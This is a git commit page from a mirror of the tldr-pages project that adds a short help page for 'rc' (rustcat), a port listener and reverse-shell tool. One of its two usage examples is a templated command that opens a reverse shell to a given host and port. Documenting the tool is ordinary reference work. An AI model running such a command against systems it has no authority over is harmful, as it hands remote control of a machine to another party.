mirror of
https://github.com/tldr-pages/tldr.git
synced 2025-08-04 18:55:34 +02:00
rc: add page (#6831)
This commit is contained in:
parent
d23184b464
commit
e36515eb02
1 changed files with 13 additions and 0 deletions
13
pages/common/rc.md
Normal file
13
pages/common/rc.md
Normal file
|
@ -0,0 +1,13 @@
|
||||||
|
# rc
|
||||||
|
|
||||||
|
> A modern simplistic port listener & reverse shell.
|
||||||
|
> Similar to `nc`.
|
||||||
|
> More information: <https://github.com/robiot/rustcat/wiki/Basic-Usage>.
|
||||||
|
|
||||||
|
- Start listening on a specific port:
|
||||||
|
|
||||||
|
`rc -lp {{port}}`
|
||||||
|
|
||||||
|
- Start a reverse shell:
|
||||||
|
|
||||||
|
`rc {{host}} {{port}} -r {{shell}}`
|
Loading…
Add table
Reference in a new issue